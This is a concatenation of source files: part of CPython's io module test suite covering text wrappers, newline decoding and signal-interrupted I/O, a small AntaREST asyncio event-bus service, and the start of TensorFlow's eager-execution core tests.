c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri_codec")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri_codec")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
#else:
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read, 1)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.readline)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
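    # The C implementation raises TypeError when the decoder or underlying
    # stream hands back the wrong type; the pure-Python implementation is more
    # permissive, so PyTextIOWrapperTest overrides maybeRaises with a no-op
    # context manager below.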
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
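        # Deliberately raise ZeroDivisionError so the tests below can assert
        # that the SIGALRM handler really ran during the blocked I/O call.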
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
        # because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
        # Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect()
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
try:
with self.assertRaises(ZeroDivisionError):
wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = [None]
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
error[0] = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error[0])
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
service.py
|
import asyncio
import logging
import threading
import time
from typing import List, Callable, Optional, Dict, Awaitable
from uuid import uuid4
from antarest.core.interfaces.eventbus import Event, IEventBus
from antarest.eventbus.business.interfaces import IEventBusBackend
logger = logging.getLogger(__name__)
class EventBusService(IEventBus):
def __init__(
self, backend: IEventBusBackend, autostart: bool = True
) -> None:
self.backend = backend
self.listeners: Dict[str, Callable[[Event], Awaitable[None]]] = {}
self.lock = threading.Lock()
if autostart:
self.start()
def push(self, event: Event) -> None:
# TODO add arg permissions with group/role, user, public
self.backend.push_event(event)
def add_listener(
self,
listener: Callable[[Event], Awaitable[None]],
type_filter: Optional[List[str]] = None,
) -> str:
with self.lock:
listener_id = str(uuid4())
self.listeners[listener_id] = listener
return listener_id
def remove_listener(self, listener_id: str) -> None:
with self.lock:
del self.listeners[listener_id]
async def _run_loop(self) -> None:
while True:
            await asyncio.sleep(0.2)  # non-blocking pause between polls of the backend
await self._on_events()
async def _on_events(self) -> None:
with self.lock:
for e in self.backend.get_events():
for listener in self.listeners.values():
try:
await listener(e)
except Exception as ex:
logger.error(
f"Failed to process event {e.type}", exc_info=ex
)
self.backend.clear_events()
def _async_loop(self, new_loop: bool = True) -> None:
loop = (
asyncio.new_event_loop() if new_loop else asyncio.get_event_loop()
)
loop.run_until_complete(self._run_loop())
def start(self, threaded: bool = True) -> None:
if threaded:
t = threading.Thread(target=self._async_loop)
            t.daemon = True
logger.info("Starting event bus")
t.start()
else:
self._async_loop(new_loop=False)
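# Minimal usage sketch, assuming some concrete IEventBusBackend implementation
# is available (none is defined in this module).  It mainly illustrates the
# listener contract: listeners must be async callables, because _on_events
# awaits them from the polling loop.
def _example_usage(backend: IEventBusBackend, event: Event) -> None:
    async def on_event(evt: Event) -> None:
        logger.info("received event %s", evt.type)

    bus = EventBusService(backend)            # autostart spawns the daemon polling thread
    listener_id = bus.add_listener(on_event)
    bus.push(event)                           # handed to the backend, picked up by the loop
    bus.remove_listener(listener_id)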
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
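# Note on the helpers above: eager execute() takes op attributes as a flat
# tuple of alternating names and values (e.g. ('dtype', <enum>, 'seed', 0)),
# which is the convention exercised by the attr-focused tests below.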
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertFalse(ctx.in_graph_mode())
self.assertTrue(ctx.in_eager_mode())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.in_graph_mode(),
ctx.in_eager_mode(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name, ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).as_gpu_tensor()
with context.device('gpu:0'):
y = constant_op.constant(2.)
    # Add would fail if y were not on GPU
result = execute(
